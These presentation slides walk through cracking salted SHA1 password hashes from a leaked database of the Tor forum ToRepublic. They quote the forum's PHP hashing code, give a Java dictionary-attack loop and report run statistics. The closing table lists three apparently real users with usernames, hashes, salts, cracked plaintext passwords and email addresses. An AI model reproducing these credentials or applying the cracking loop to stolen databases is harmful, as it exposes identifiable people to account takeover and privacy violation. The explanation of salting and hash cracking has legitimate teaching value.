Who I am?

Bartosz Zychal

Intern in Capgemini since 1.02.2016

Member of Starter-Kit group

This presentation is shared on my github account http://bartoszzychal.github.io/Breaking-ToRepublic-s-user-s-password/

What is ToRepublic?

ToRepublic is a forum in deep web (TOR).

Forum's database and source code were leaked

...and are here: https://github.com/ToRepublic/ToRepublic

How I knew how the passwords were hashed?

Hashes have a length of 40 characters (hex encoded), so I guessed it's SHA1

Source code from file: login.php

							$form_password_hash = forum_hash($form_password, $salt);

function: forum_hash()

Source code from file: functions.php

function forum_hash($str, $salt){

$return = ($hook = get_hook('fn_forum_hash_start')) ? eval($hook) : null;
if ($return != null)
	return $return;

return sha1($salt.sha1($str));

So passwords were hashed by schema:


What is salt?

In cryptography, a salt is random data that is used as an additional input to a one-way function that "hashes" a password or passphrase.

How I break the passwords?

I used dictionary method

Main loop

while (dictionary.ready() && existsNotBreakHash) {
	String word = dictionary.readWord();
	String sha1 = DigestUtils.sha1Hex(word);
		String encodeSaltSha1 = DigestUtils.sha1Hex(user.getSalt().concat(sha1));
		if (user.getPassword().equals(encodeSaltSha1)) {
			database.updateUserData(user, word);

Apache Commons Codec is used to generate the digests.


Dictionary: 4GB (320*106 words)

Hashes to crack: ~2000

Hashes cracked: 103

Digests generated: 40*109

Time: 40h

CPU: Intel® Core™ i7-4810MQ 2.8 GHz

CPU usage: 100%


user_id username password salt dpassword email
30 inf3c7ed ee880c4bcdcaf761a6358844f5891ec040a4cf25 -QHsr`HPFAhs q1w2e3r4t5y6u7i8 inf3c7ed@safe-mail.net
95 luigii 93f0504a5fa819296800b89e86fea421630e3eca Do1Z%Dz2=.DV opt1muspr1me luigii@safe-mail.net
820 albus3 572d1ed5d5ff6d6d5867fec616d90097e21b6046 qrM{xp*2uG5$ beutyandthebeast albus3@safe-mail.net